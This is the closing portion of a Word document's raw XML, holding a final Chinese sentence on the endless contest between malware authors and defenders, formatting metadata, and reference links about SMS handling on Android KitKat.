        <w:t>中的恶意软件有一定的防范作用。</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可见魔高一尺，道高一丈，攻防双方的</w:t>
      </w:r>
      <w:r w:rsidR="00D65EE2">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>较量</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>是永无穷尽的！</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00C869EE" w:rsidSect="004C50B8">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6F3" w:rsidRDefault="009336F3" w:rsidP="00105669">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="009336F3" w:rsidRDefault="009336F3"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6F3" w:rsidRDefault="009336F3" w:rsidP="00105669">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="009336F3" w:rsidRDefault="009336F3"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14"/>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947"/>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B63E6"/>
    <w:rsid w:val="000C26AF"/>
    <w:rsid w:val="000C44E6"/>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949"/>
    <w:rsid w:val="00222A42"/>
    <w:rsid w:val="00222B1A"/>
    <w:rsid w:val="00223751"/>
    <w:rsid w:val="0022445E"/>
    <w:rsid w:val="002254A9"/>
    <w:rsid w:val="00225983"/>
    <w:rsid w:val="002300D5"/>
    <w:rsid w:val="00230E99"/>
    <w:rsid w:val="0023465E"/>
    <w:rsid w:val="00234BCE"/>
    <w:rsid w:val="00235087"/>
    <w:rsid w:val="00236E58"/>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04C"/>
    <w:rsid w:val="002E50D6"/>
    <w:rsid w:val="002E517A"/>
    <w:rsid w:val="002F0448"/>
    <w:rsid w:val="002F0A8B"/>
    <w:rsid w:val="002F2886"/>
    <w:rsid w:val="002F3D5C"/>
    <w:rsid w:val="002F6EF5"/>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6155"/>
    <w:rsid w:val="003366A7"/>
    <w:rsid w:val="003367C1"/>
    <w:rsid w:val="00336A30"/>
    <w:rsid w:val="003400D5"/>
    <w:rsid w:val="00343049"/>
    <w:rsid w:val="00344E8E"/>
    <w:rsid w:val="00346254"/>
    <w:rsid w:val="0034633D"/>
    <w:rsid w:val="00350E98"/>
    <w:rsid w:val="00352199"/>
    <w:rsid w:val="003556EC"/>
    <w:rsid w:val="00361AD8"/>
    <w:rsid w:val="003655AA"/>
    <w:rsid w:val="003662A1"/>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92CC9"/>
    <w:rsid w:val="003A1099"/>
    <w:rsid w:val="003A1330"/>
    <w:rsid w:val="003A24C4"/>
    <w:rsid w:val="003A2B34"/>
    <w:rsid w:val="003A7319"/>
    <w:rsid w:val="003B3493"/>
    <w:rsid w:val="003B4539"/>
    <w:rsid w:val="003B588D"/>
    <w:rsid w:val="003B60FB"/>
    <w:rsid w:val="003B63C6"/>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4BFC"/>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703"/>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0B8"/>
    <w:rsid w:val="004C5484"/>
    <w:rsid w:val="004C552A"/>
    <w:rsid w:val="004D120B"/>
    <w:rsid w:val="004D1E02"/>
    <w:rsid w:val="004D1F31"/>
    <w:rsid w:val="004D48C9"/>
    <w:rsid w:val="004D7B99"/>
    <w:rsid w:val="004E1A4B"/>
    <w:rsid w:val="004E3961"/>
    <w:rsid w:val="004E51F6"/>
    <w:rsid w:val="004E66A3"/>
    <w:rsid w:val="004E6829"/>
    <w:rsid w:val="004F1000"/>
    <w:rsid w:val="004F183E"/>
    <w:rsid w:val="004F285E"/>
    <w:rsid w:val="004F55F9"/>
    <w:rsid w:val="004F699D"/>
    <w:rsid w:val="004F7941"/>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248BB"/>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0400"/>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19B5"/>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4796"/>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11A4"/>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9A9"/>
    <w:rsid w:val="00782371"/>
    <w:rsid w:val="007852F5"/>
    <w:rsid w:val="00786F2C"/>
    <w:rsid w:val="00790D27"/>
    <w:rsid w:val="0079359F"/>
    <w:rsid w:val="007936DF"/>
    <w:rsid w:val="0079545A"/>
    <w:rsid w:val="00796E99"/>
    <w:rsid w:val="007971AC"/>
    <w:rsid w:val="00797E85"/>
    <w:rsid w:val="007A16E3"/>
    <w:rsid w:val="007A21CC"/>
    <w:rsid w:val="007A3194"/>
    <w:rsid w:val="007A6E16"/>
    <w:rsid w:val="007A7C2D"/>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1A27"/>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17A25"/>
    <w:rsid w:val="00920C97"/>
    <w:rsid w:val="00922116"/>
    <w:rsid w:val="009222F2"/>
    <w:rsid w:val="00922D3A"/>
    <w:rsid w:val="0092374E"/>
    <w:rsid w:val="00923AFA"/>
    <w:rsid w:val="00923F2B"/>
    <w:rsid w:val="00927E44"/>
    <w:rsid w:val="009303D9"/>
    <w:rsid w:val="009336F3"/>
    <w:rsid w:val="00940A30"/>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2666"/>
    <w:rsid w:val="009F4370"/>
    <w:rsid w:val="009F4538"/>
    <w:rsid w:val="009F704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27E78"/>
    <w:rsid w:val="00A30A30"/>
    <w:rsid w:val="00A32A44"/>
    <w:rsid w:val="00A3418B"/>
    <w:rsid w:val="00A368C9"/>
    <w:rsid w:val="00A40FC8"/>
    <w:rsid w:val="00A42B9F"/>
    <w:rsid w:val="00A43DE4"/>
    <w:rsid w:val="00A45E4A"/>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A8F"/>
    <w:rsid w:val="00A95D89"/>
    <w:rsid w:val="00A9643D"/>
    <w:rsid w:val="00A97689"/>
    <w:rsid w:val="00AA1F97"/>
    <w:rsid w:val="00AA5A28"/>
    <w:rsid w:val="00AA5BF3"/>
    <w:rsid w:val="00AA5CAB"/>
    <w:rsid w:val="00AA60D7"/>
    <w:rsid w:val="00AA6319"/>
    <w:rsid w:val="00AB102F"/>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9AD"/>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9B3"/>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1D"/>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65AF2"/>
    <w:rsid w:val="00C70481"/>
    <w:rsid w:val="00C70C29"/>
    <w:rsid w:val="00C70F52"/>
    <w:rsid w:val="00C71DB4"/>
    <w:rsid w:val="00C71F72"/>
    <w:rsid w:val="00C7543B"/>
    <w:rsid w:val="00C769B9"/>
    <w:rsid w:val="00C76D73"/>
    <w:rsid w:val="00C777EF"/>
    <w:rsid w:val="00C85868"/>
    <w:rsid w:val="00C869EE"/>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345E"/>
    <w:rsid w:val="00D144C7"/>
    <w:rsid w:val="00D15C52"/>
    <w:rsid w:val="00D15FC3"/>
    <w:rsid w:val="00D21518"/>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5EE2"/>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6794"/>
    <w:rsid w:val="00DD78F3"/>
    <w:rsid w:val="00DD7B8D"/>
    <w:rsid w:val="00DE608D"/>
    <w:rsid w:val="00DE636B"/>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1099"/>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80"/>
    <w:rsid w:val="00F01BF3"/>
    <w:rsid w:val="00F0495B"/>
    <w:rsid w:val="00F101E4"/>
    <w:rsid w:val="00F110CC"/>
    <w:rsid w:val="00F13438"/>
    <w:rsid w:val="00F14234"/>
    <w:rsid w:val="00F147C1"/>
    <w:rsid w:val="00F17D5D"/>
    <w:rsid w:val="00F20C3E"/>
    <w:rsid w:val="00F21236"/>
    <w:rsid w:val="00F271A1"/>
    <w:rsid w:val="00F364D6"/>
    <w:rsid w:val="00F406F2"/>
    <w:rsid w:val="00F4316B"/>
    <w:rsid w:val="00F45A59"/>
    <w:rsid w:val="00F53C46"/>
    <w:rsid w:val="00F542E0"/>
    <w:rsid w:val="00F545F3"/>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176F2F-9DB0-419F-9173-D53C8055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F13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76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2746831">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07693189">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6873919">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1229341020">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2065367395">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>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36989877">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74454299">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908686945">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1922331237">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34530477">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="610281541">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="256133773">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="75"/>
              <w:marBottom w:val="75"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1247957945">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="75"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="single" w:sz="6" w:space="0" w:color="CCCCCC"/>
                    <w:left w:val="single" w:sz="6" w:space="0" w:color="CCCCCC"/>
                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="CCCCCC"/>
                    <w:right w:val="single" w:sz="6"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ndroid-developers.blogspot.in/2013/10/getting-your-sms-apps-ready-for-kitk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xyz_lmn/article/details/128367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beijingshi1/article/details/9094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0109450/abort-sms-intent-on-android-kitka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ackoverflow.com/questions/25988574/delete-sms-from-android-on-4-4-4-affected-rows-0zero-after-deleted" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.vogella.com/tutorials/AndroidBroadcastReceiver/article.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951B0-61F6-4EFF-BF74-B3D44E7F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5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-12-26T13:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-11-15T09:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>